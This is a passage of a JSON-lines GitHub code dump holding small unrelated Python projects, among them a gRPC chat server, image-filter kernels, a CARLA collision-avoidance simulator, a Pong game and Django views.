self.hover)\n self.bind('<Leave>', self.leave)\n self.rowconfigure(1, weight=1)\n\n def hover(self, event):\n self.config(highlightbackground=self.activebordercolor, highlightcolor=self.activebordercolor, bg=self.hovercolor)\n self.label.config(bg = self.hovercolor, foreground = self.hoverforeground)\n def leave(self, event):\n self.config(highlightbackground=self.bordercolor, highlightcolor=self.bordercolor, bg=self.fillcolor)\n self.label.config(bg = self.fillcolor, foreground=self.foreground)\n\n def bind(self, event, command):\n self.label.bind(event, command)\n \n def changeIcon(self, imagepath=None, imageData = None):\n if imagepath != None:\n self.iconPIL = Image.open(imagepath)\n self.icon = ImageTk.PhotoImage(self.iconPIL)\n \n self.label.config(image = self.icon)\n elif imageData != None:\n self.icon = PhotoImage(data = imageData)\n self.label.config(image = self.icon)\n else: \n return\n\n def changeColors(self, newfillcolor, newhovercolor, newforeground, newhoverforeground, newbordercolor, newactivebordercolor):\n self.fillcolor = newfillcolor\n self.hovercolor=newhovercolor\n self.foreground=newforeground\n self.hoverforeground = newhoverforeground\n self.bordercolor=newbordercolor\n self.activebordercolor=newactivebordercolor\n self.config(bg=self.fillcolor, highlightcolor = newactivebordercolor, highlightbackground = newbordercolor)\n self.label.config(bg=self.fillcolor)\n","repo_name":"chartsNgraphs/Python-Chatbot","sub_path":"IconButton.py","file_name":"IconButton.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"}
{"seq_id":"44028004111","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 4 21:47:36 2016\nQUEUE:\n(i) Room for one more element:\n<- - -- - -- - - - -> \n..A]|[B][C][D][E][F][G][H][]|[A..\n| ^ End; objects are appended here\n|\n^ Start; objects are handed out here\n\nThe queue can be seen as a circle. The start and the end move\nindependently of each other - but depend on how quickly tasks are removed or\ninserted.\nThe queue is full when the last element is occupied.\n@author: frye\n\"\"\"\nfrom node import LinkedList\n\nclass Queue(object):\n def __init__(self, n):\n self.start = 0\n self.end = 0\n self.maximum = n\n self.voll = False\n self.queue = LinkedList(None)\n def isEmpty(self):\n \"\"\" Returns if queue is empty\n \"\"\"\n #return self.start == (self.end and not self.voll)\n return self.queue.pointer.value is None\n \n def isFull(self):\n return self.voll\n \n def enqueue(self, element):\n if(self.isFull()):\n return \"Queue is Full\"\n else:\n self.queue.pre(element)\n #oldself.queue[self.end] = element\n # when end == maximum it wraps around to 0, otherwise it is incremented\n self.end = (self.end + 1) % self.maximum\n if(self.start == self.end):\n \n self.voll = True\n \n def dequeue(self):\n \"\"\" Returns first element and increases start\n \"\"\"\n if( self.isEmpty()):\n return None\n else:\n self.voll = False\n iVar = self.queue.pointer.value\n self.queue.rm(iVar)\n #iVar = self.queue[self.start]\n self.start = (self.start + 1) % self.maximum\n return iVar\n \n def front(self):\n \"\"\" Return first element\n \"\"\"\n if(self.isEmpty()):\n return None\n else:\n return self.queue.pointer.value\n \n \n \nmyQueue = Queue(10) # create a queue for 10 elements\n\nfor i in range(12):\n myQueue.enqueue(i)\nfor i in range(12):\n print(str(i)+\" ---> \" + str(myQueue.dequeue()))\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"raviolican/pythonstackQueue","sub_path":"queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"1235422200","text":"import asyncio\nimport chat_pb2\nimport chat_pb2_grpc\nimport grpc\nimport time\n\nfrom concurrent import futures\nfrom channel_manager import AbstractChannel, ChannelManager\nfrom google.protobuf.empty_pb2 import Empty\n\n\nclass ChatServicer(chat_pb2_grpc.ChatServicer):\n\n    def __init__(self, channel_manager: AbstractChannel):\n        assert isinstance(channel_manager, AbstractChannel)\n        self.channel_manager = channel_manager\n\n    async def CreateChannel(self, request, context: grpc.aio.ServicerContext):\n        channel = request.channel\n        channel.created_at = int(time.time())\n        self.channel_manager.create(channel.id)\n        return Empty()\n\n    async def ListChannels(self, request, context: grpc.aio.ServicerContext):\n        channel_ids = self.channel_manager.list()\n        response = chat_pb2.ListChannelsResponse(channel_ids=channel_ids)\n        return response\n\n    async def SendMessage(self, request, context: grpc.aio.ServicerContext):\n        \"\"\"Appends into Channels by channel_id -> Channel by user_id -> Messages. 
\"\"\"\n message = request.message\n is_broadcast = message.is_broadcast\n if is_broadcast:\n self.channel_manager.broadcast_message(message)\n else:\n self.channel_manager.append_message(message)\n return Empty()\n\n def Stream(self, request, context: grpc.aio.ServicerContext):\n \"\"\"Reads Messages by user_id in Channel by channel_id in Channels if exists.\"\"\"\n user_id = request.user_id\n channel_id = request.channel.id\n\n self.channel_manager.join(user_id, channel_id)\n\n while True:\n if not self.channel_manager.has_message(user_id, channel_id):\n time.sleep(0.1)\n continue\n message = self.channel_manager.pop_message(user_id, channel_id)\n yield chat_pb2.StreamResponse(message=message)\n\n\nasync def serve() -> None:\n servicer = ChatServicer(ChannelManager())\n server = grpc.aio.server(futures.ThreadPoolExecutor(max_workers=10))\n chat_pb2_grpc.add_ChatServicer_to_server(servicer, server)\n\n server.add_insecure_port('[::]:50051')\n await server.start()\n try:\n await server.wait_for_termination()\n except KeyboardInterrupt:\n # Shuts down the server with 0 seconds of grace period. During the\n # grace period, the server won't accept new connections and allow\n # existing RPCs to continue within the grace period.\n await server.stop(0)\n\n\nif __name__ == '__main__':\n asyncio.run(serve())\n","repo_name":"anuscode/grpc-chatting","sub_path":"chat_server.py","file_name":"chat_server.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25689730684","text":"import itertools\nimport numpy as np\nfrom numpy.typing import NDArray\nfrom typing import Callable,Any,List,Tuple\n\ndef extend_image(pixels:NDArray[np.uint8], radius:int) -> NDArray[np.uint8]:\n \"\"\"Extends an image, using the values of the border pixels across the extension.\"\"\"\n padding:List[Tuple[int,int]] = [(0,0)]*len(pixels.shape)\n padding[0] = padding[1] = (radius,radius)\n padded_pixels: NDArray[np.uint8] = np.pad(pixels, padding) # type: ignore\n\n for i in range(0, radius):\n padded_pixels[i] = padded_pixels[radius]\n padded_pixels[:,i] = padded_pixels[:,radius]\n for i in range(-radius, 0):\n padded_pixels[i] = padded_pixels[-radius-1]\n padded_pixels[:,i] = padded_pixels[:,-radius-1]\n\n return padded_pixels\n\ndef boxfilter(pixels:NDArray[np.uint8], radius:int=1):\n \"\"\"Applies a box filter to an image, with a given radius.\"\"\"\n result:NDArray[np.uint16] = np.zeros(pixels.shape, dtype=np.uint16) # type: ignore\n padded_pixels: NDArray[np.uint8] = extend_image(pixels, radius)\n \n get_slice: Callable[[int], slice] = lambda k: slice(radius+k,k-radius if k < radius else None)\n for i,j in itertools.product(range(-radius,radius+1), range(-radius,radius+1)):\n # print(weighted_pixels[sliceX, sliceY,0])\n result += padded_pixels[get_slice(i), get_slice(j)]\n\n return np.array(result / (2*radius + 1)**2 , dtype=np.uint8)\n\n\ndef convolve(pixels:NDArray[np.uint8], kernel:NDArray[Any]) -> NDArray[float]:\n \"\"\"Performs a convolution on a matrix, using the given kernel.\"\"\"\n radius = len(kernel)//2\n result:NDArray[float] = np.zeros(pixels.shape, dtype=float) # type: ignore\n padded_pixels: NDArray[np.uint8] = extend_image(pixels, radius)\n\n get_slice: Callable[[int], slice] = lambda k: slice(radius+k,k-radius if k < radius else None)\n for i,j in itertools.product(range(-radius,radius+1), range(-radius,radius+1)):\n # print(weighted_pixels[sliceX, sliceY,0])\n x = 
(kernel[radius+i,radius+j]*padded_pixels[get_slice(i), get_slice(j)]).astype(float)\n # print(x.dtype)\n result += x\n\n return result\n\nsobel_kernel_x = 1/8 * np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]], dtype=np.int8)\nsobel_kernel_y = np.flip(sobel_kernel_x.T)\n\nlaplace_kernel = 1/4 * np.array([[0,-1,0], [-1,4,-1], [0,-1,0]])\ngaussian_kernel = 1/16 * np.array([[1,2,1],[2,4,2],[1,2,1]])\n\ndef sobel_filter(pixels):\n \"\"\"Applies a sobel filter to an image.\"\"\"\n pixels = convolve(pixels, gaussian_kernel)\n\n dx = convolve(pixels, sobel_kernel_x)\n dy = convolve(pixels, sobel_kernel_y)\n\n return np.sqrt(dx**2 + dy**2)\n","repo_name":"angelo-daumas/ImageProcessing","sub_path":"kernels.py","file_name":"kernels.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73437750649","text":"from models.model import CompanyModel\nfrom schemas.company import Company\n\n\nclass CompanyService():\n\n def __init__(self, db) -> None:\n self.db = db\n\n def getCompanies(self):\n result = self.db.query(CompanyModel).all()\n return result\n\n def getCompany(self, id: int):\n result = self.db.query(CompanyModel).filter(\n CompanyModel.id == id).first()\n return result\n\n def createCompany(self, company: Company):\n new_company = CompanyModel(**company.dict())\n self.db.add(new_company)\n self.db.commit()\n return\n\n def updateCompany(self, id: int, data: Company):\n company = self.db.query(CompanyModel).filter(\n CompanyModel.id == id).first()\n company.name = data.name\n company.description = data.description\n company.start_date = data.start_date\n company.country = data.country\n company.cover = data.cover\n self.db.commit()\n return\n\n def deleteCompany(self, id: int):\n self.db.query(CompanyModel).filter(\n CompanyModel.id == id).delete()\n self.db.commit()\n return\n","repo_name":"efdree/py-api-critics","sub_path":"services/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19536153871","text":"\n\n\n#%% imports\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n#%% \n\n# an old script to mess with a parametrized logistic curve\n\nX = np.linspace(-5, 5, num = 101)\n\nn_sigma = 3\ny_n = 0.9\n\nr = (1/n_sigma) * np.log(y_n/(1-y_n))\n\nY = 1/(1+np.exp(-r*X))\n\n\n\n\n\n\nplt.figure(figsize = (8, 8))\n\nn_sigma = 3\ny_n = 0.99\nr = (1/n_sigma) * np.log(y_n/(1-y_n))\nY = 1/(1+np.exp(-r*X))\nplt.plot(X, Y, label = f'{n_sigma} {y_n}')\n\n\nn_sigma = 2\ny_n = 0.95\nr = (1/n_sigma) * np.log(y_n/(1-y_n))\nY = 1/(1+np.exp(-r*X))\nplt.plot(X, Y, label = f'{n_sigma} {y_n}')\n\n\nn_sigma = 3\ny_n = 0.95\ntranslate_y = 1\n\nr = (1/n_sigma) * np.log(y_n/(1-y_n))\nY = 1/(1+np.exp(-r*(X-translate_y)))\nplt.plot(X, Y, label = f'{n_sigma} {y_n}')\n\n\nplt.legend(loc = 'best')\nplt.show()\n\n\n\n#%%\n\n\n\n\n#%%\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"yoann-ba/utils_misc","sub_path":"logistic_curve.py","file_name":"logistic_curve.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43500338980","text":"from not_needed_anymore.Joc import Joc\r\n\r\nclass Stare:\r\n \"\"\"\r\n 
Class used by the minimax and alpha-beta algorithms\r\n    An instance of the Stare class is a node in the minimax tree\r\n    It has the game board as a property\r\n    It works on the condition that MIN_PLAYER and MAX_PLAYER (the two possible players) are defined in the Game class\r\n    It also requires that the Game class defines a method called mutari() which returns the list of possible configurations after a player's move\r\n    \"\"\"\r\n\r\n    # TO DO 2\r\n    def __init__(self, tabla_joc, j_curent, adancime, parinte=None, estimare=None):\r\n        self.tabla_joc = tabla_joc\r\n        self.j_curent = j_curent\r\n\r\n        # depth in the state tree\r\n        self.adancime = adancime\r\n\r\n        # estimate of how favourable the state is (if it is final) or of the best child state (for the current player)\r\n        self.estimare = estimare\r\n\r\n        # list of possible moves (also of type State) from the current state\r\n        self.mutari_posibile = []\r\n\r\n        # the best move from the list of possible moves for the current player\r\n        # it is of type State (the best successor)\r\n        self.stare_aleasa = None\r\n\r\n    def mutari(self):\r\n        l_mutari = self.tabla_joc.all_possible_moves(self.j_curent) # list of information from the successor nodes\r\n        joc_opus = Joc.jucator_opus(self.j_curent)\r\n\r\n        # below we compute the list of child nodes (successors)\r\n        l_stari_mutari = [Stare(mutare, joc_opus, self.adancime - 1, parinte=self) for mutare in l_mutari]\r\n\r\n        return l_stari_mutari\r\n\r\n    def __str__(self):\r\n        sir = str(self.tabla_joc) + \"(Current player:\" + self.j_curent + \")\n\"\r\n        return sir","repo_name":"Fusneica-FlorentinCristian/FMI-UniBuc","sub_path":"Anul-II/Sem-II/IA/KR/Proiecte/Jocuri/not_needed_anymore/Stare.py","file_name":"Stare.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"72046926968","text":"import carla\nimport random\nimport math\nimport time\nfrom enum import Enum\nfrom lib.driver import Driver\nfrom lib.nocollide import NoCollide\nfrom lib.data import Speed, Distance\nfrom lib.sim_interfaces import SimSensor, SimSensorGroup\n\n\nclass Scenario(Enum):\n    FAST_STATIC = 0\n    MID_STATIC = 1\n    SLOW_STATIC = 2\n    FAST_DYNAMIC = 3\n    MID_DYNAMIC = 4\n    SLOW_DYNAMIC = 5\n    EDGE_CASE_1 = 6\n\n\nclass Simulator(Driver):\n    def __init__(self, scen: Scenario):\n        self.client = carla.Client('localhost', 2000)\n        self.client.set_timeout(2.0) # seconds\n\n        self.world = self.client.get_world()\n        self.blueprint_library = self.world.get_blueprint_library()\n\n        self.map = self.world.get_map()\n\n        self.obstacles = []\n\n        self.scen = scen\n        self.start_coords = {\"x\": 232, \"y\": -40}\n\n        self.max_speed = 0\n\n    def __enter__(self):\n        try:\n            self.build()\n        except Exception as e:\n            self.clear()\n            raise e\n\n        # self.render_thread.start()\n        return self\n\n    def __exit__(self, exc_type, exc_val, exc_tb):\n        self.clear()\n\n    def clear(self):\n        if hasattr(self, \"car\"):\n            self.car.destroy()\n        if hasattr(self, \"left_sensor\"):\n            self.left_sensor.destroy()\n        if hasattr(self, \"mid_sensor\"):\n            self.mid_sensor.destroy()\n        if hasattr(self, \"right_sensor\"):\n            self.right_sensor.destroy()\n\n        for o in self.obstacles:\n            o.destroy()\n\n    def spawn_car(self, coords, yaw, model=\"cybertruck\") -> carla.Vehicle:\n        vehicle_bp = random.choice(self.blueprint_library.filter(f'vehicle.tesla.{model}'))\n        transform = carla.Transform(carla.Location(**coords, z=1), carla.Rotation(yaw=yaw))\n        car = self.world.spawn_actor(vehicle_bp, transform)\n        
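        # Keep a reference to every spawned vehicle in self.obstacles so that
        # clear() can destroy it again when the scenario is torn down or rebuilt.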
self.obstacles.append(car)\n return car\n\n def build(self):\n self.clear()\n\n finish = lambda: None\n if self.scen == Scenario.FAST_STATIC:\n self.start_coords = {\"x\": 232, \"y\": 0}\n self.spawn_car({\"x\": self.start_coords[\"x\"], \"y\": self.start_coords[\"y\"] + 130}, 0)\n finish = lambda: self.set_throttle(1.0)\n elif self.scen == Scenario.MID_STATIC:\n self.start_coords = {\"x\": 232, \"y\": 0}\n self.spawn_car({\"x\": self.start_coords[\"x\"], \"y\": self.start_coords[\"y\"] + 60}, 0)\n finish = lambda: self.set_throttle(0.6)\n elif self.scen == Scenario.SLOW_STATIC:\n self.start_coords = {\"x\": 232, \"y\": 0}\n self.spawn_car({\"x\": self.start_coords[\"x\"], \"y\": self.start_coords[\"y\"] + 60}, 0)\n finish = lambda: self.set_throttle(0.3)\n elif self.scen == Scenario.FAST_DYNAMIC:\n self.start_coords = {\"x\": 232, \"y\": -40}\n car = self.spawn_car({\"x\": self.start_coords[\"x\"], \"y\": self.start_coords[\"y\"] + 100}, 90)\n car.apply_control(carla.VehicleControl(throttle=0.5))\n finish = lambda: self.set_throttle(1.0)\n elif self.scen == Scenario.MID_DYNAMIC:\n self.start_coords = {\"x\": 232, \"y\": -40}\n car = self.spawn_car({\"x\": self.start_coords[\"x\"], \"y\": self.start_coords[\"y\"] + 60}, 90)\n car.apply_control(carla.VehicleControl(throttle=0.2))\n finish = lambda: self.set_throttle(0.5)\n\n # Chose a vehicle blueprint at random.\n vehicle_bp = random.choice(self.blueprint_library.filter('vehicle.tesla.model3'))\n transform = carla.Transform(carla.Location(**self.start_coords, z=1), carla.Rotation(yaw=90))\n self.car = self.world.spawn_actor(vehicle_bp, transform)\n\n obstacle_sensor_bp = self.blueprint_library.find(\"sensor.other.obstacle\")\n obstacle_sensor_bp.set_attribute(\"distance\", \"40\")\n obstacle_sensor_bp.set_attribute(\"sensor_tick\", \"0.1\")\n # obstacle_sensor_bp.set_attribute(\"debug_linetrace\", \"True\")\n\n # transform = carla.Transform(carla.Location(x=0.8, y=0.8, z=1), carla.Rotation(yaw=0))\n # self.left_sensor = SimSensor(self.world.spawn_actor(obstacle_sensor_bp, transform, attach_to=self.car))\n # self.left_sensor.listen()\n #\n # transform = carla.Transform(carla.Location(x=-0.8, y=0.8, z=1), carla.Rotation(yaw=0))\n # self.right_sensor = SimSensor(self.world.spawn_actor(obstacle_sensor_bp, transform, attach_to=self.car))\n # self.right_sensor.listen()\n\n transform = carla.Transform(carla.Location(x=0.0, y=0.8, z=1), carla.Rotation(yaw=0))\n self.mid_sensor = SimSensor(self.world.spawn_actor(obstacle_sensor_bp, transform, attach_to=self.car), max_range=40)\n self.mid_sensor.listen()\n\n # self.sensor_group = SimSensorGroup(None, [self.left_sensor, self.mid_sensor, self.right_sensor], [\"left\", \"mid\", \"right\"])\n self.sensor_group = SimSensorGroup(None, [self.mid_sensor], [\"mid\"])\n finish()\n\n # ======================================================\n # -- Abstract Methods ----------------------------------\n # ======================================================\n\n def get_speed(self) -> Speed:\n\n speed_vector = self.car.get_velocity()\n current_speed = math.sqrt(speed_vector.x**2 + speed_vector.y**2 + speed_vector.z**2) / 3.6\n if current_speed > self.max_speed:\n self.max_speed = current_speed\n\n speed_time = time.perf_counter()\n return Speed(current_speed, speed_time)\n\n def set_throttle(self, val: float):\n self.car.apply_control(carla.VehicleControl(throttle=val))\n\n def set_brake(self, val):\n self.car.apply_control(carla.VehicleControl(brake=val))\n\n def run_forever(self):\n pass\n\n def warn(self):\n 
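        \"\"\"Print a large ASCII-art \"ATTENTION!\" banner to the console.\"\"\"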
msg = \"\"\"\n        _______   _______   _______   ______   _   _   _______   _____    ____    _   _    _ \n     /\\     |__   __| |__   __| |  ____| | \\ | | |__   __| |_   _|  / __ \\  | \\ | |  | |\n    /  \\       | |       | |    | |__    |  \\| |    | |      | |   | |  | | |  \\| |  | |\n   / /\\ \\      | |       | |    |  __|   | . ` |    | |      | |   | |  | | | . ` |  | |\n  / ____ \\     | |       | |    | |____  | |\\  |    | |     _| |_  | |__| | | |\\  |  |_|\n /_/    \\_\\    |_|       |_|    |______| |_| \\_|    |_|    |_____|  \\____/  |_| \\_|  (_)\n        \"\"\"\n        print(msg)\n\n\nif __name__ == \"__main__\":\n    with Simulator(Scenario.FAST_DYNAMIC) as sim:\n        brain = NoCollide(None, sim.sensor_group)\n\n        brain.driver = sim\n        time.sleep(2)\n        brain.run()\n        print(f\"Max Speed: {sim.max_speed*3.6} km/h\")\n        try:\n            while True:\n                pass\n        except KeyboardInterrupt:\n            pass","repo_name":"cayox/NoCollide","sub_path":"src/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":6697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"44060935092","text":"# Bakalarka\n\nimport pandas as pd\nfrom matplotlib import pyplot\nimport numpy as np\n\n# Prices \n\nfname_prices = \"/Users/kristian/bakalarka/MonthlyPrices.csv\"\ndata = pd.read_csv(fname_prices, \";\")\n\ndata[\"date\"] = pd.to_datetime(data[\"date\"], format = \"%YM%m\")\nprices = pd.DataFrame(data)\nprices = prices.set_index(\"date\")\nprices.index.name = \"Month\"\nprices = prices[[\"Wheat, US HRW\"]]\nprices = prices.loc[\"1960-02-01\":]\nprint(prices.head())\n\n# SPEI (change positives to negatives)\n\nfname_spei = \"/Users/kristian/Desktop/bakalářka/data sucho/wheat (US great plains) - 160.csv\"\nspei = pd.read_csv(fname_spei, \";\")\nspei[\"DATA\"] = pd.to_datetime(spei[\"DATA\"], format = \"%b%Y\")\nspei_df = pd.DataFrame(spei)\nspei_df = spei_df.set_index(\"DATA\")\nspei1 = spei_df[\"SPEI_3\"]\nspei1 = spei1.loc[\"1960-02-01\":]\nspei2 = np.array([-x for x in spei1])\nspei2 = pd.DataFrame({\"SPEI_3\": spei2}, index = prices.index)\n\nprint(spei2.head())\n#np.corrcoef(prices,spei2)\npyplot.plot(spei2)\npyplot.plot(prices)\n\n\n# Relative changes\n## Prices \n\nrelative_changes = prices.pct_change()\nrelative_changes = relative_changes.dropna()\nrelative_changes = pd.DataFrame(relative_changes)\nrelative_changes = relative_changes *100\npyplot.plot(relative_changes)\nprint(relative_changes)\n\n# Dickey-Fuller test for non-stationarity: prices\nfrom statsmodels.tsa.stattools import adfuller\nX = relative_changes.iloc[:,0].values\nresult = adfuller(X)\nprint('ADF Statistic: %f' % result[0])\nprint('p-value: %f' % result[1])\nprint('Critical Values:')\nfor key, value in result[4].items():\n    print('\\t%s: %.3f' % (key, value))\n    \n# Dickey-Fuller test for non-stationarity: spei\nX = spei2.iloc[:,0].values\nresult = adfuller(X)\nprint('ADF Statistic: %f' % result[0])\nprint('p-value: %f' % result[1])\nprint('Critical Values:')\nfor key, value in result[4].items():\n    print('\\t%s: %.3f' % (key, value)) \n\n# OLS before filtering\n\nfrom sklearn.metrics import mean_squared_error, r2_score\nimport statsmodels.api as sm\n\nols = pd.concat([relative_changes, spei2], axis = 1)\nols = ols[\"1960-03-01\":]\nprint(ols)\nY = ols[\"Wheat, US HRW\"] \nX = ols[\"SPEI_3\"]\n\nmodel = sm.OLS(Y,X)\nresults = model.fit()\nprint(np.corrcoef(X,Y))\nresults.summary()\n\n# Filter\nj = 5\n\ndef movingaverage_shorter (values, window):\n    weights = np.repeat(1.0, window)/(window)\n    sma = np.convolve(values, weights, 'valid')\n    return sma\n\ndef movingaverage_longer (values, window):\n    weights = np.repeat(1.0, window)/window\n    sma = 
np.convolve(values, weights, 'valid')\n    return sma\n\npriceMA = movingaverage_shorter(Y[2**(j):],2**j) - movingaverage_longer(Y,2**(j+1))\nspeiMA = movingaverage_shorter(X[2**(j):],2**j) - movingaverage_longer(X,2**(j+1))\n\nspeiMA1 = pd.DataFrame({\"SPEI_3\": speiMA}, index = relative_changes.index[2**(j+1)-1:])\npriceMA1 = pd.DataFrame({\"Wheat, US HRW\": priceMA}, index = relative_changes.index[2**(j+1)-1:])\nols_filter = pd.concat([priceMA1, speiMA1], axis = 1)\nols_filter\n\npyplot.plot(priceMA1)\npyplot.plot(speiMA1)\nnp.corrcoef(priceMA,speiMA)\n\n# OLS after filter\n\nYY = ols_filter[\"Wheat, US HRW\"]\nXX = ols_filter[\"SPEI_3\"]\n\nmodel = sm.OLS(YY,XX)\nresults = model.fit()\nresults.summary()\n","repo_name":"kkrispikk/Bakalarka","sub_path":"bakalarka.py","file_name":"bakalarka.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"19697865978","text":"#!/usr/bin/env python3\n\nimport sys\nsys.path.append(\"src\")\nfrom misc.load_utils import read_pickle\nimport argparse\nimport numpy as np\n\nparser = argparse.ArgumentParser(description='Basic embedding file statistics')\nparser.add_argument('--data', default=\"/data/hp/dpr-c.embd\")\nargs = parser.parse_args()\n\ndata = read_pickle(args.data)\n\nprint(f\"Number of queries: {len(data['queries']):>7}\")\nprint(f\"Number of docs: {len(data['docs']):>7}\")\nprint(f\"Query shape: {data['queries'][0].shape}\")\nprint(f\"Query element type: {str(data['queries'][0].dtype)}\")\nprint()\nprint()\nprint(\"Boundaries:\", data[\"boundaries\"])\nprint()\nprint(\n    f'Average number of spans per question: {np.average([len(x) for x in data[\"relevancy\"]]):.2f}'\n)\nprint(\n    f'Average number of spans per document: {np.average([len(x) for x in data[\"relevancy_articles\"]]):.2f}'\n)\nprint()\n\ndata[\"queries\"] = np.array(data[\"queries\"])\ndata[\"docs\"] = np.array(data[\"docs\"])\n\nprint(f\"Average of query embedding 1-norm:\",\n      \"{:.3f}\".format(np.average(np.linalg.norm(\n          data[\"queries\"], axis=1, ord=1))),\n      \"std:\",\n      \"{:.3f}\".format(np.std(np.linalg.norm(data[\"queries\"], axis=1, ord=1)))\n      )\nprint(f\"Average of doc embedding 1-norm: \",\n      \"{:.3f}\".format(np.average(np.linalg.norm(data[\"docs\"], axis=1, ord=1))),\n      \"std:\",\n      \"{:.3f}\".format(np.std(np.linalg.norm(data[\"docs\"], axis=1, ord=1)))\n      )\nprint()\nprint(f\"Average of query embedding 2-norm:\",\n      \"{:.3f}\".format(np.average(np.linalg.norm(\n          data[\"queries\"], axis=1, ord=2))),\n      \"std:\",\n      \"{:.3f}\".format(np.std(np.linalg.norm(data[\"queries\"], axis=1, ord=2)))\n      )\nprint(f\"Average of doc embedding 2-norm: \",\n      \"{:.3f}\".format(np.average(np.linalg.norm(data[\"docs\"], axis=1, ord=2))),\n      \"std:\",\n      \"{:.3f}\".format(np.std(np.linalg.norm(data[\"docs\"], axis=1, ord=2)))\n      )\n","repo_name":"zouharvi/kb-shrink","sub_path":"src/misc/analyze_size.py","file_name":"analyze_size.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"}
{"seq_id":"30257573888","text":"from turtle import Screen\r\nfrom paddle import Paddle\r\nfrom ball import Ball\r\nfrom scoreboard import Scoreboard\r\ngame_is_on = True\r\nBALL_SPEED = 0.2\r\n\r\nscreen = Screen()\r\n\r\nscreen.setup(width=800, height=600)\r\nscreen.bgcolor(\"black\")\r\nscreen.title(\"Pong King!\")\r\nscreen.tracer(0)\r\npaddle_left = Paddle(-390)\r\npaddle_right = Paddle(380)\r\nscoreboard_left = 
Scoreboard(-200)\r\nscoreboard_right = Scoreboard(200)\r\nscoreboard_left.create_middle()\r\nball = Ball()\r\n\r\nscreen.listen()\r\nscreen.onkeypress(key=\"Up\", fun=paddle_right.up)\r\nscreen.onkeypress(key=\"Down\", fun=paddle_right.down)\r\nscreen.onkeypress(key=\"w\", fun=paddle_left.up)\r\nscreen.onkeypress(key=\"s\", fun=paddle_left.down)\r\n#\r\n\r\nwhile game_is_on:\r\n screen.update()\r\n ball.move()\r\n # detect colission with up and down boundary\r\n if ball.ycor() > 270 or ball.ycor() < -280:\r\n ball.collision_with_up_down()\r\n # detect collision with paddle\r\n for seg in paddle_left.paddle_body:\r\n if ball.distance(seg) < 15:\r\n ball.collision_with_paddle()\r\n ball.speed_up()\r\n for seg in paddle_right.paddle_body:\r\n if ball.distance(seg) < 15:\r\n ball.collision_with_paddle()\r\n ball.speed_up()\r\n # detect collision with right boundary\r\n if ball.xcor() > 380:\r\n scoreboard_left.score +=1\r\n scoreboard_left.update()\r\n ball.recenter()\r\n # detect collision with right boundary\r\n if ball.xcor() < -380:\r\n scoreboard_right.score += 1\r\n scoreboard_right.update()\r\n ball.recenter()\r\nscreen.exitonclick()\r\n","repo_name":"inosven/Projects-of-100-Days-of-Code-Python-2023-","sub_path":"day22-pong-game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"3439796502","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.shortcuts import redirect\nfrom django.urls import reverse\nfrom django.views.generic import ListView, CreateView, UpdateView\n\nfrom locations.models import Locations\n\n\nclass LocationsView(LoginRequiredMixin, ListView):\n model = Locations\n template_name = 'locations/locations_index.html'\n paginate_by = 2\n\n\nclass CreateLocationsView(LoginRequiredMixin, CreateView):\n model = Locations\n fields = ['name']\n template_name = 'locations/locations_form.html'\n\n def get_success_url(self):\n return reverse('locations:lista_locatii')\n\n\nclass UpdateLocationsView(LoginRequiredMixin, UpdateView):\n model = Locations\n fields = ['name', 'coordinates', 'last_accessed', 'mark']\n template_name = 'locations/locations_form.html'\n\n def get_success_url(self):\n return reverse('locations:lista_locatii')\n\n\n@login_required\ndef delete_locations(request, pk):\n Locations.objects.filter(id=pk).update(active=0)\n return redirect('locations:lista_locatii')\n\n\n@login_required\ndef activate_locations(request, pk):\n Locations.objects.filter(id=pk).update(active=1)\n return redirect('locations:lista_locatii')\n","repo_name":"nasteeex/Licenta","sub_path":"django_project/gui/locations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3046319375","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#importing necessary libraries\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport warnings\n\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error\n\nwarnings.filterwarnings(\"ignore\")\n\n\n# # Loading the dataset\n\n# 